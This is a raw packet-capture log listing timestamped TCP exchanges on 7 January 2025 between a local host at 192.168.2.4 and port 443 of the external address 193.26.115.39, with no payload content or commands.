Jan 7, 2025 06:23:06.053234100 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.053292990 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.053494930 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.053510904 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.053551912 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.053561926 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.053590059 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.053600073 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.053760052 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.053776026 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.053824902 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.053832054 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.053843975 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.053870916 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.142299891 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.142318964 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.142369986 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.142390966 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.142405987 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.142426968 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.142545938 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.142561913 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.142602921 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.142611027 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.142627001 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.142642021 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.142884016 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.142904997 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.142946005 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.142955065 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.142970085 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.142995119 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.143163919 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.143171072 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.143227100 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.143234015 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.143273115 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.143518925 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.143533945 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.143577099 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.143583059 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.143623114 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.143752098 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.143771887 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.143806934 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.143812895 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.143838882 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.143848896 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.144104958 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.144119978 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.144171953 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.144181967 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.144198895 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.144237041 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.144403934 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.144418955 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.144455910 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.144464970 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.144486904 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.144509077 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.232714891 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.232739925 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.232784033 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.232795000 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.232820988 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.232836962 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.233091116 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.233114004 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.233150005 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.233158112 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.233186960 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.233196974 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.233642101 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.233659983 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.233705997 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.233714104 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.233743906 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.233755112 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.233782053 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.233797073 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.233833075 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.233839989 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.233865976 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.233874083 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.234054089 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.234071016 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.234108925 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.234114885 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.234136105 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.234148979 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.234462976 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.234479904 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.234528065 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.234540939 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.234550953 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.234584093 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.234705925 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.234719992 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.234754086 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.234761000 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.234793901 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.234801054 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.234978914 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.234993935 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.235035896 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.235043049 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.235066891 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.235074997 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.323561907 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.323580027 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.323628902 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.323647976 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.323662996 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.323697090 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.323894024 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.323911905 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.323954105 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.323961020 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.323973894 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.324112892 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.324131966 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.324155092 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.324155092 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.324162960 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.324187040 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.324207067 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.324497938 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.324512005 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.324553967 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.324559927 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.324584961 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.324600935 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.324728966 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.324743032 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.324794054 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.324803114 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.325006962 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.325104952 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.325118065 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.325171947 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.325177908 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.325217009 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.325289011 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.325303078 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.325341940 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.325347900 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.325367928 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.325387001 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.325643063 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.325650930 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.325715065 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.325722933 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.325767040 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.414242029 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.414267063 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.414315939 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.414339066 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.414350986 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.414378881 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.414503098 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.414519072 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.414558887 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.414567947 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.414604902 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.414604902 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.414777994 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.414793968 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.414839983 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.414846897 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.414875031 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.414885044 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.415110111 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.415124893 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.415169001 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.415175915 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.415199041 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.415214062 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.415371895 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.415388107 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.415432930 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.415442944 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.415456057 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.415476084 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.415771008 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.415787935 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.415848970 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.415857077 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.415926933 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.415999889 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.416013956 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.416068077 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.416074038 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.416100025 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.416119099 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.416222095 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.416237116 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.416268110 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.416274071 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.416307926 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.416321039 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.504777908 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.504806995 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.504884958 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.504899979 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.505074978 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.505150080 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.505167007 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.505207062 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.505214930 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.505239010 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.505248070 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.505285978 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.505300999 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.505338907 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.505345106 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.505378962 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.505387068 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.505594015 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.505613089 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.505656958 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.505664110 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.505686045 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.505702019 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.505935907 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.505950928 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.506000996 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.506007910 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.506030083 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.506037951 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.506191969 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.506201029 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.506252050 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.506259918 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.506274939 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.506289005 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.517189980 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.517205000 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.517256975 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.517265081 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.517299891 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.517308950 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.517435074 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.517441988 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.517503023 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.517509937 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.517740965 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.595649958 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.595666885 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.595747948 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.595747948 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.595761061 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.595803976 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.595837116 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.595850945 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.595895052 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.595901966 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.595917940 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.595937967 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.596199989 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.596215963 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.596261024 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.596268892 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.596288919 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.596302032 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.596442938 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.596458912 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.596498013 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.596503973 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.596533060 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.596541882 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.596796989 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.596813917 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.596874952 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.596880913 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.596924067 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.607805014 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.607821941 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.607887030 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.607887030 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.607897043 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.607939005 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.608057022 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.608072996 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.608113050 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.608120918 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.608135939 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.608156919 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.608462095 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.608484030 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.608520985 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.608527899 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.608551025 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.608593941 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.686261892 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.686285973 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.686362028 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.686374903 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.686619997 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.686639071 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.686692953 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.686702013 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.686912060 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.686925888 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.686969995 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.686980963 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.686992884 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.687021017 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.687109947 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.687125921 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.687180042 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.687190056 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.687453032 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.687472105 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.687511921 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.687521935 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.687536955 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.687751055 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.698406935 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.698424101 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.698470116 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.698477983 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.698503017 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.698514938 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.698816061 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.698831081 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.698873997 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.698882103 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.698894024 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.698975086 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.699127913 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.699143887 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.699179888 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.699187040 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.699213982 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.699223995 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.776732922 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.776751041 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.776798010 CET	49736	443	192.168.2.4	193.26.115.39
Jan 7, 2025 06:23:06.776825905 CET	443	49736	193.26.115.39	192.168.2.4
Jan 7, 2025 06:23:06.776840925 CET	49736	443	192.168.2.4	193.26.115.39
